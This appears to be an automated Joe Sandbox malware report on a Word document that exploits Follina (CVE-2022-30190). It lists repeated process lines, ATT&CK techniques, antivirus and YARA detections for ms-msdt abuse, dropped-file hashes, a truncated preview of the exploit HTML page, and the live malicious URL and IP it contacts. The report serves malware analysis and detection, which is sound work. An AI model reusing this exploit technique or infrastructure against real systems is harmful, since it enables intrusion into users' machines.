      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution      		Path InterceptionPath Interception1
      Masquerading      		OS Credential Dumping1
      File and Directory Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
      System Information Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
      Ingress Tool Transfer      		SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      3BgX69C870.docx20%MetadefenderBrowse
      3BgX69C870.docx65%ReversingLabsDocument-Word.Trojan.Leonem
      3BgX69C870.docx100%AviraW97M/Dldr.Agent.G1

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm100%AviraJS/CVE-2022-30190.G

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://ascota.cc/index.html100%Avira URL Cloudmalware
      https://ascota.cc/index.htmlyX100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ascota.cc
      		50.31.246.2
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://ascota.cc/index.htmltrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://ascota.cc/index.htmlyX~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp.0.drtrue
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        50.31.246.2
        		ascota.ccUnited States
        		40509FLYUStrue

        General Information

        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:686208
        Start date and time:2022-08-18 10:44:00 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 10s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:3BgX69C870 (renamed file extension from none to docx)
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.expl.evad.winDOCX@1/19@7/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer

        Warnings

        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • VT rate limit hit for: 3BgX69C870.docx

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        FLYUS3zkECrUffH.dllGet hashmaliciousBrowse
        • 208.85.60.95
        RFQ - 1100195199 - 1100190914.exeGet hashmaliciousBrowse
        • 50.31.246.1
        OQchDohurA.exeGet hashmaliciousBrowse
        • 77.83.141.16
        PO(EME39134).xlsxGet hashmaliciousBrowse
        • 38.146.68.210
        inv.exeGet hashmaliciousBrowse
        • 77.83.142.181

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        05af1f5ca1b87cc9cc9b25185115607d0mvOExDB0u.docxGet hashmaliciousBrowse
        • 50.31.246.2
        efhJIHRd2Y.docxGet hashmaliciousBrowse
        • 50.31.246.2
        QcwjPo33VV.docxGet hashmaliciousBrowse
        • 50.31.246.2
        qoIZSkdejM.docxGet hashmaliciousBrowse
        • 50.31.246.2
        C1ZGt61uGv.docxGet hashmaliciousBrowse
        • 50.31.246.2
        FzgkVbUkUm.docxGet hashmaliciousBrowse
        • 50.31.246.2
        YccRHfFd3T.docxGet hashmaliciousBrowse
        • 50.31.246.2
        fHER4lglqY.docxGet hashmaliciousBrowse
        • 50.31.246.2
        wWLwoD14Xo.docxGet hashmaliciousBrowse
        • 50.31.246.2
        ZZkLH4O0Y3.docxGet hashmaliciousBrowse
        • 50.31.246.2
        icRTA4gcSe.docxGet hashmaliciousBrowse
        • 50.31.246.2
        dfqqRjnCV5.docxGet hashmaliciousBrowse
        • 50.31.246.2
        uaMVRwwuyZ.docxGet hashmaliciousBrowse
        • 50.31.246.2
        SOA USD 85,200.00.docxGet hashmaliciousBrowse
        • 50.31.246.2
        ORDER 4X30DB.docxGet hashmaliciousBrowse
        • 50.31.246.2
        Order 90541#.docxGet hashmaliciousBrowse
        • 50.31.246.2
        NextEra RFQ and Business Proposition.docxGet hashmaliciousBrowse
        • 50.31.246.2
        BL-20-89DS.docxGet hashmaliciousBrowse
        • 50.31.246.2
        NOA & Pre-loading docs of CBHU9101956.docxGet hashmaliciousBrowse
        • 50.31.246.2
        Product_specification_1.docxGet hashmaliciousBrowse
        • 50.31.246.2
        7dcce5b76c8b17472d024758970a406b0mvOExDB0u.docxGet hashmaliciousBrowse
        • 50.31.246.2
        efhJIHRd2Y.docxGet hashmaliciousBrowse
        • 50.31.246.2
        C6e7u1DTVc.docxGet hashmaliciousBrowse
        • 50.31.246.2
        QcwjPo33VV.docxGet hashmaliciousBrowse
        • 50.31.246.2
        qoIZSkdejM.docxGet hashmaliciousBrowse
        • 50.31.246.2
        C1ZGt61uGv.docxGet hashmaliciousBrowse
        • 50.31.246.2
        FzgkVbUkUm.docxGet hashmaliciousBrowse
        • 50.31.246.2
        YccRHfFd3T.docxGet hashmaliciousBrowse
        • 50.31.246.2
        dl18aYTBo5.docxGet hashmaliciousBrowse
        • 50.31.246.2
        fHER4lglqY.docxGet hashmaliciousBrowse
        • 50.31.246.2
        wWLwoD14Xo.docxGet hashmaliciousBrowse
        • 50.31.246.2
        ZZkLH4O0Y3.docxGet hashmaliciousBrowse
        • 50.31.246.2
        icRTA4gcSe.docxGet hashmaliciousBrowse
        • 50.31.246.2
        dfqqRjnCV5.docxGet hashmaliciousBrowse
        • 50.31.246.2
        uaMVRwwuyZ.docxGet hashmaliciousBrowse
        • 50.31.246.2
        Product Data Sheet.xlsxGet hashmaliciousBrowse
        • 50.31.246.2
        transcation_swift_dload_16Aug2022_15324.docGet hashmaliciousBrowse
        • 50.31.246.2
        SOA USD 85,200.00.docxGet hashmaliciousBrowse
        • 50.31.246.2
        ORDER 4X30DB.docxGet hashmaliciousBrowse
        • 50.31.246.2
        SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsGet hashmaliciousBrowse
        • 50.31.246.2

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.287309170602846
        Encrypted:false
        SSDEEP:24:I3vz5C4tB37gITt5YTznw5zIvD8eJRlp3q6RcBahzjo+NdyjuOrmklIW5CeilIgY:I3tRBWiaJ1cKokWI8g0HYUrJNggNg4H
        MD5:E88B0DB57BD8675D626F241A6DE70B77
        SHA1:A905F7B1FE5C94F5EB3D065C6A0C45C310A324D4
        SHA-256:E0F862F742FB0A23119306427F50BC351CC9D4A75641B0A2D0EC223A2DA455C1
        SHA-512:195184D3328417C698B187DCBEA9AFB3AE7EC87011E3D81F61F676D244FE6A43799680F309E1E9E58080BCA1C1BF2B88CDFCA8DF22E3EC0A7B82F3981EB3A572
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.|QB..|N..'t.%7ES,...X.F...Fa.q............................]3..2.O..Vyzd...........qo.<%pJ.H..h....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{18325489-8F7D-4DDB-A0BA-943F66DE838D}.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.673737435800811
        Encrypted:false
        SSDEEP:96:KXCy678Rx3elt6r+EoGfv8hK8vf+futyAGM5pBJqBJIXfMDfM:s67xH6+GQM
        MD5:4E51082DA6651E300B6C91259223A9F5
        SHA1:0FD415C74D18EBF8112CFDB8451CCB6152997D72
        SHA-256:34FAB831A61A9FBEAA60DC7688ABEDA8B8CA3A89003B751CE1D12A57765E6BA1
        SHA-512:46B38094A02D0478382190B76657A979812E1EA75F15634A62E26E6266AA3E0420E99742BD785272592D6E214124B5F9A53057AD259E13CBEDB6747473069CBB
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z..X.qw.L.......S,...X.F...Fa.q...............................p..7F..Q6..(X..........^e..O.y..l."..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.92546706296779
        Encrypted:false
        SSDEEP:3:yVlgsRlzGhBl9WkH79S6n+SlIM79lkidhg276:yPblzK9WkUtSh7Eeg22
        MD5:4F6DB96FDF66F7A6788031D2D5CC0232
        SHA1:D0F1CC860AFCAE629276405D2DA64E03F3982DB6
        SHA-256:CEC9440988E986CBA29C346683E7FF21BE973AB95A3D67DE7A77445B60FB9274
        SHA-512:C80F97898F4622EE5FFB8BF654524D2DC4AF8A25284EE0045509D6FA381EE798DBA3062A342C1811F26685876D81F6F53DC83FD69EC6863FA55A736DEFE993F5
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.1.8.3.2.5.4.8.9.-.8.F.7.D.-.4.D.D.B.-.A.0.B.A.-.9.4.3.F.6.6.D.E.8.3.8.D.}...F.S.D..

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28419277005313737
        Encrypted:false
        SSDEEP:48:I3xIqRBEnJ9LCFzEZ1O1zQ4YorOmLyQjNlrNja1l1KzF1xRLF1xR7H:KBLkfW9qazQQrOMjNp5+v+x9xdH
        MD5:64F56300F83EAAE5CB4770F023FD03A0
        SHA1:AE8D9FA45CBFBD8C1C1E3A26AEAD897AAB28CACB
        SHA-256:4D8512C5B86DC08807105EC85E96BBAE98A28727A7DF0D40DCCD72102F1768E7
        SHA-512:9D5F629C1E2F871C424FB1511C8212FAD109276B083D24077FA92BBF2856126D39094A6FCD102A941A07298CD110607C9F2B715C67E940EB6457C08E2F9E826F
        Malicious:false
        Reputation:low
        Preview:......M.eFy...zxT...._A.N7...O.S,...X.F...Fa.q............................7.Ti...H..2..5.........Fq..._.H..e..!*..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1B7B41A5-9895-47A6-B199-1C3C2D73F38A}.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2220402862857889
        Encrypted:false
        SSDEEP:48:I3bUrB4RxF1XOWUXC9YLZ0Fv6C6MYD+39Xoh6h9Xoh6L:KbC4RN+WUd+taMXWkXWQ
        MD5:656A91268490890538FDA8214268BD9D
        SHA1:93F9AD21F70617632CF7A28BADBFB5730244CED5
        SHA-256:BB7045980D9DED29076811A7B4A90A8ED256886DC75B646A271A3A8A82BE3B38
        SHA-512:52C0DDE4984DFAF3D7EF2E7D3EBB3D51ABD0B7981482D6FF13AF319A0E49231AB41A7A864CBA32A17B72C8BDA8FC01763256F9D73C8CDD261A03482A1D800163
        Malicious:false
        Reputation:low
        Preview:......M.eFy...zc.Bv.f.@.R....%.S,...X.F...Fa.q..............................C.]..I...&X...........-..z[.A..P..]n.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.9626738605132825
        Encrypted:false
        SSDEEP:3:yVlgsRlz8IlR1eyQWRAOGyivlUMlZ+lsg276:yPblzrj16WHGyivlUMuz22
        MD5:997672D88598225C3FA2F51B1E3BD35E
        SHA1:D36469237EE014C361BE1D97F07B13097CB7BD55
        SHA-256:245EDC20169C2604F500F382CCEC9105CA5E93E799F99E56823282A5FB672EEF
        SHA-512:F3E08AF2F8A75E6196C2FC18A14846B5A0580A77FE3D690486497FD40DE9AF24880BDDDA641F47DF828972114DAE43A2FFAFAF6A2421E7F5A79D5DF89F631338
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.1.B.7.B.4.1.A.5.-.9.8.9.5.-.4.7.A.6.-.B.1.9.9.-.1.C.3.C.2.D.7.3.F.3.8.A.}...F.S.D..

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:downloaded
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        IE Cache URL:https://ascota.cc/index.html
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\739101BE.emf

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):4988
        Entropy (8bit):3.8049842046783233
        Encrypted:false
        SSDEEP:48:E3TN78sdBgLfVTped//HksYHGui3DAjG6kpnydHkgSu:E3Z7xBSTped//qH3i3DAq+EgSu
        MD5:EB1198A6B05E17758FE7464367AD7D5F
        SHA1:933D38674C516990F9E65B2D30C5F88C47D594E0
        SHA-256:DF3CE08C1EEA90005CF71F477D1FE40E2A43C0FC826003A8C2263A275CDBCA5C
        SHA-512:98A2A83FBB9D6F8C04F77BACAD1EA0A70C7EDA90C8260125D77A162E5746DDCE850A89DEBE65222A7EE9F9CF01C4209EE3345A46C18787A67A3E366A4E75DD21
        Malicious:false
        Reputation:low
        Preview:....l...........C.../...........R....... EMF....|...........................8.......+...............8...............................L...5...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r...............5............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Nasreddine Bencherchali, Christian Burkard
